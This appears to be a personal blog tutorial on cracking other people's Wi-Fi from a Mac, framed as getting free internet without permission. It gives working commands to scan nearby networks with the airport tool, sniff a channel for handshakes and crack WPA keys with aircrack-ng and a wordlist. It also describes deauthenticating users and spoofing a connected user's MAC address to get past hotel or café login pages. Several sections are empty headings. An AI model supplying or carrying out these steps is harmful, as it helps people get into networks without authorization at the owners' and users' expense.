Configuration : MacOS 10.15

This is a particular tutorial, for those who wonder how to connect to a wifi when you don’t have its password… and wonder what’s the hacky way to get to the internet using this wifi network… Here are two techniques.

Wifi cracking depends on its security. We will cover three of these.

1 - WEP password

Too easy (and very few nowdays)… please read this

2 - WPA or WPA2 password

Identify the target acces point

First of all, we need to know which Wifi network to attack. We need its MAC address (BSSID ex: ba:b6:62:68:31:45) & channel (~ frequency slot ex: 10)

We will use the macOS airport feature, there is nothing to install.

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

Results looks like this :

SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
orange 1e:81:d8:dc:27:56 -87 3 Y FR NONE
Domino-F90A 88:f3:ab:79:f6:1a -74 1 N WPA(PSK/TKIP/TKIP)

Note :
If you want to avoid typing /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport every time, you can run this to make a shortcut as airport : sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

Sniff a channel

We now want to retrieve connexion information about the Domino-F90A Wifi. Connexion information can be a beacon, or a handshake. This is how we do it :

Let’s say we are connected to the internet on the wifi of our macbook, and we don’t have any other USB wifi adapter pluged. Then the only way for us to scan networks around is going to be on our wifi interface called en0. This may be different if you want to plug your eternal wifi card (ex: en1). Also make sure you use sudo. Note that the 1 is the channel number from the array above.

sudo airport en0 sniff 1

You should see something like

Capturing 802.11 frames on en0.

We are now recording everything on the Domino’s wifi. We have to wait… for what ? Well for a connexion information ! And we could wait forever, but there is a trick. We can force a user to disconnect, hoping he will reconnect soon after. It’s called Deauth.

How to Deauth :

Crack the password using the dump

Exit the sniffing by typing ctrl+C for instance, it will tell you the name of the sniffed information file.

ex: Session saved to /tmp/airportSniffP3Iz.cap

If you don’t have it, install aircrack-ng using sudo port install aircrack-ng and then crack the password:

aircrack-ng -1 -a 1 -b 88:f3:ab:79:f6:1a /tmp/airportSniffP3Iz.cap
# or if you have a list of common password
aircrack-ng -w commonPwd.txt -b 88:f3:ab:79:f6:1a /tmp/airportSniffP3Iz.cap

Note:
There are faster, and more efficient methods. Check out the reference section.

3 - No password, but a user/login window (ex: hotel, airport…)

Let’s say you want to join a Starbuck coffee wifi, but you don’t have any money for a coffee… Let’s say no one wants to give you the user/login to gain access. Then you have one last solution : using the mac adress of someone already connected.

Spy on someone

Find someone already allowed to join the network and copy its MacAdress. The Kismet tool is the best suited for macOS users.

Change your MacAdress (spoofing)

Let’s say your wifi network is called en0 (type ifconfig to be sure, see this for more information).

Other options :

Other tricks

TO BE CONTINUED => read this

Reference

Main source of inspiration : WPA wifi cracking on a MacBook Pro with deauth
Nice medium tutorial : How To Crack WPA/WPA2 Wi-Fi Passwords Using Aircrack-ng
Other software: Ettercap to Intercept Passwords with ARP Spoofing
Best Wireless Network Adapter for Wi-Fi Hacking: buying List
No password : Mac adress spoffing
TLDR : short gist if you have no time
list of common password for WPA guessing
ifconfig features : hw, ether…
Spoofing issues on Macbook : reddit